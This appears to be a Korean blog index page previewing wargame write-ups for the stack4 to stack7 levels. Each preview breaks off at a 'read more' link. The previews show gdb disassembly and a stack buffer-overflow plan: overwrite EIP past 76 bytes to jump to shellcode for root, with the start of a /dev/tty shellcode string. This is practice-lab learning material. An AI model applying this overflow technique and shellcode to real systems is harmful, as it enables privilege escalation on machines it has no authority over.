stack6,7 (gdb) disas mainDump of assembler code for function main:0x080484fa :push ebp0x080484fb :mov ebp,esp0x080484fd :and esp,0xfffffff00x08048500 :call 0x8048484 //바로 점프0x08048505 :mov esp,ebp0x08048507 :pop ebp0x08048508 :ret End of assembler dump.(gdb) disas getpathDump of assembler code for function getpath:0x08048484 :push ebp0x08048485 :mov ebp,esp0x08048487 :sub esp,0x68//0x68byte 할당0x0804848a .. 더보기 stack5 0x080483c4 :push ebp0x080483c5 :mov ebp,esp0x080483c7 :and esp,0xfffffff00x080483ca :sub esp,0x500x080483cd :lea eax,[esp+0x10]0x080483d1 :mov DWORD PTR [esp],eax0x080483d4 :call 0x80482e8 0x080483d9 :leave 0x080483da :ret 뭐 아까하고 비슷하네요 버퍼,더미, SFP까지 총 76byte 있고 EIP 조작하는 문제네요. 단지 EIP를 쉘코드가 있는 주소로 점프시켜 root를 따야할 것 같습니다. 쉘코드는 "\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\.. 더보기 stack4 (gdb) disas mainDump of assembler code for function main:0x08048408 :push ebp0x08048409 :mov ebp,esp0x0804840b :and esp,0xfffffff00x0804840e :sub esp,0x500x08048411 :lea eax,[esp+0x10]//입력받은 값을 저장할 버퍼0x08048415 :mov DWORD PTR [esp],eax0x08048418 :call 0x804830c 0x0804841d :leave 0x0804841e :ret End of assembler dump.(gdb) disas winDump of assembler code for function win:0x080483f4 :push ebp0x080.. 더보기 이전 1 ··· 21 22 23 24 25 26 27 다음
